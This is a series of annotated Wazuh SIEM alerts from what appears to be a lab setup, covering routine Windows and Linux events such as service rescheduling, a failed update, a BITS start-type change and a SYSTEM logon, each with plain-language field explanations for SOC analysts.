Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534819.2397819
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:45:44.7822583Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2421
Incremental log record number – handy for timeline order.

data.win.system.processID:  10660
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:44Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:44Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:06.554+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:06.554+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534826.2399401
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-WindowsUpdateClient
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {945a8954-c147-4acd-923f-40c45405a658}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  20
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  13
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000028
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:45:51.3230557Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3030
Incremental log record number – handy for timeline order.

data.win.system.processID:  9648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NMPJ99VJBWV-Microsoft.YourPhone."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.errorCode:  0x80073d02
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateTitle:  9NMPJ99VJBWV-Microsoft.YourPhone
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateGuid:  {2eb475fe-568c-40c0-97c7-1b48d934a305}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateRevisionNumber:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceGuid:  {855e8a7c-ecb4-4ca3-b045-1dfa50104289}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:47:23.520+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:23.520+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534843.2401275
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:46:11.7493654Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3035
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  7040
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:24.740+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:24.740+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534844.2403086
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:47:24.340053+00:00 server1 sshd[3469]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:47:24.340053+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is back to normal load.

🧠 What happened? Agent event queue is back to normal load.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:47:32.293+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:47:32.293+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is back to normal load.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  205
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534852.2403479
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'normal'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  normal
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:34.057+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:34.057+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534974.2403694
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:47:09.2829375Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2423
Incremental log record number – handy for timeline order.

data.win.system.processID:  9456
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:09Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:09Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:43.422+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:43.422+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534983.2405274
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:47:59.3887351Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43974
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:44.991+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:44.991+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534984.2412611
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

